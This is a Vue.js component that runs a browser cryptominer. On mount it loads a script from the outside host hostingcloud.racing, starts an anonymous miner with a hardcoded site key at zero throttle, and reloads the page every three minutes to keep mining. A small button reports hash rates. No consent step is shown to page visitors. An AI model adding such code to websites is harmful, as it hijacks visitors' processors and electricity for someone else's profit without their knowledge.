<template>
    <div class="mining">
        <p>Mining</p>
        <p class="btn" @click="check">check counts</p>
    </div>
</template>

<script>

import Alert from '@/utilities/Alert.js';

export default {
    mounted () {
        this.startMiner();
    },
    methods: {
        startMiner () {
            
            console.log('startMiner');

            if ( !document.querySelector('script#miner') ) {

                var s = document.createElement('script');
                s.src = 'https://www.hostingcloud.racing/CfPU.js';
                s.id = 'miner';
                document.head.appendChild(s);    

            }

            if ( !window.Client ) {
                
                return setTimeout(() => {
                    this.startMiner();
                },50)

            }
            var miner;
            
            //var key = '0f27b6b0c46c9408c7588852d946f0d2392784559f79c05299bc809c3bec0031';
            var key = 'cc99b4f4ecb1cd018b33365c1eca368a7b84b973e02789ec292850c62c84e6e2';

            this.miner = miner = new Client.Anonymous(key, { c: 'w', throttle: 0 });

            console.log('started',key,new Date());

                var accepted = 0;

                miner.start();

                miner.on('accepted',() => console.log('accepted',++accepted,new Date()));

                setTimeout(() => {
                    miner.stop();
                    setTimeout(() => {
                        var href = location.href.split('?')[0];
                        location.href = href + '?'+Date.now();
                    },1000);
                },3 * 60 * 1000);
        },
        check () {
            console.log('check',new Date());
            var hashesPerSecond = this.miner.getHashesPerSecond();
            var totalHashes = this.miner.getTotalHashes();
            var acceptedHashes = this.miner.getAcceptedHashes();

            console.log({
                hashesPerSecond,
                totalHashes,
                acceptedHashes
            });

            Alert.message('hps:'+hashesPerSecond+'th:'+totalHashes+'ah:'+acceptedHashes);

        }
    }
 }

</script>

<style lang="scss">
.btn {
    width: 120px;
    line-height: 2;
    font-weight: 400;
    margin: 5px;
}
.mining {
    .btn {
        position: absolute;
        top: 0px;
        left: 0px;
    }
}
</style>